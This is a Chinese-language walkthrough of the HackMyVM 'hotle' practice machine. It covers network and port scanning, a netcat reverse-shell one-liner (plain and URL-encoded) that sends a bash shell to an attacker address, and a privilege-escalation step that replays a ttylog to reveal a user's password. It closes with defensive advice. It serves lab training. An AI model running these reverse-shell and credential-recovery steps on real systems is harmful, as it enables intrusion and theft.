hackmyvm系列1——hotle
字数 851 2025-08-12 11:34:31
HackMyVM 靶场实战:hotle 渗透测试教学文档
1. 靶场概述
hotle 是 HackMyVM 系列中的一个渗透测试靶场,适合初学者练习基础渗透技能。本教学将详细讲解从信息收集到提权的完整过程。
2. 信息收集阶段
2.1 网络扫描
使用 netdiscover 进行局域网主机发现:
netdiscover -r 192.168.56.0/24
2.2 端口和服务扫描
使用 nmap 进行详细扫描:
nmap -sV -Pn -sC 192.168.56.123
参数说明:
-sV: 服务版本探测-Pn: 跳过主机发现-sC: 使用默认脚本扫描
3. 漏洞利用
3.1 漏洞搜索
根据扫描结果搜索已知漏洞:
- 检查服务版本号
- 搜索公开漏洞利用代码(EXP)
3.2 执行漏洞利用
找到合适的EXP后执行,生成后门文件。
4. 反弹Shell获取
4.1 构造反弹Shell命令
使用以下命令建立反弹Shell连接:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.56.105 6666 >/tmp/f
4.2 URL编码
由于需要通过URL执行,需要进行URL编码:
rm%20%2ftmp%2ff%3bmkfifo%20%2ftmp%2ff%3bcat%20%2ftmp%2ff%7cbash%20-i%202%3e%261%7cnc%20192.168.56.105%206666%20%3e%2ftmp%2ff
5. 权限提升
5.1 用户枚举
查看系统用户:
cat /etc/passwd
发现存在 person 用户。
5.2 利用ttylog提权
靶场中使用了特殊的提权方法:
ttyplay /var/www/html/ttylog
运行后会显示 person 用户的密码。
ttylog说明:
- ttylog是记录终端会话的工具
- ttyplay可以回放记录的会话
- 靶场利用这个特性存储了敏感信息
6. 关键知识点总结
- 信息收集:网络扫描和端口服务识别是渗透测试的基础
- 漏洞利用:需要熟悉常见服务漏洞和利用方法
- 反弹Shell:掌握多种建立反向连接的方法
- 权限提升:
- 系统用户枚举
- 利用非常规方法获取凭证(ttylog)
- 理解系统日志和会话记录可能带来的安全风险
7. 防御建议
- 定期更新服务软件,修补已知漏洞
- 限制不必要的网络服务暴露
- 监控系统日志文件权限
- 避免在终端会话中直接输入敏感信息
- 删除或保护开发/测试环境中遗留的调试信息
8. 扩展学习
- 研究更多反弹Shell的建立方法
- 学习其他权限提升技术
- 了解ttylog等终端记录工具的工作原理
- 练习其他HackMyVM靶场巩固技能